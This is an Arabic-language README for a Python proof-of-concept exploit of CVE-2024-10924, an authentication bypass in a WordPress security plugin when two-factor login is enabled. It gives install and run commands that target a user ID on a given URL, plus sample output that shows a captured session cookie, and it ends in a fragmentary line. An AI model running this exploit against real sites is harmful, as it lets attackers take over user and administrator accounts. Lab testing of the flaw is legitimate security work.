
POC لـ CVE-2024-10924 مكتوب بلغة Python
يسمح خلل في معالجة الأخطاء في REST API للمكوّن الإضافي Really Simple Plugins الخاص بـ WordPress (الإصدارات من 9.0.0 حتى 9.1.1.1 شاملة) للمهاجم، عند تفعيل المصادقة الثنائية (2FA)، بتجاوز المصادقة والسيطرة على حساب مستخدم أو مسؤول موجود.
بما أنني شخص لطيف، ستجد أيضًا الإصدار 9.1.1.1 من المكوّن. فقط قم بفك الضغط ورفعه في مجلد wp-content/plugins. لا تنسَ تفعيل المكوّن وتشغيل 2FA.
ثبّت التبعيات المطلوبة باستخدام pip:
pip install -r requirements.txt
python exploit.py [-id USER_ID] URL
مع معرف مستخدم محدد:
python exploit.py -id 10 http://localhost:8886/
يرسل هذا حمولة الاستغلال مع معرف مستخدم بقيمة 10.
بدون تحديد معرف مستخدم:
python exploit.py http://localhost
يتم تعيين معرف المستخدم افتراضيًا إلى 1.
Exploit successful.
--------------------------------------------------
session_id=xyz123; path=/; HttpOnly
--------------------------------------------------
Exploit failed. Maybe the target is not vulnerable or the user ID is incorrect.
verify=False) فقط إذا كان ذلك ضروريًا للاختبار.لا أعلم، لكنني لست مسؤولًا عن أي شيء.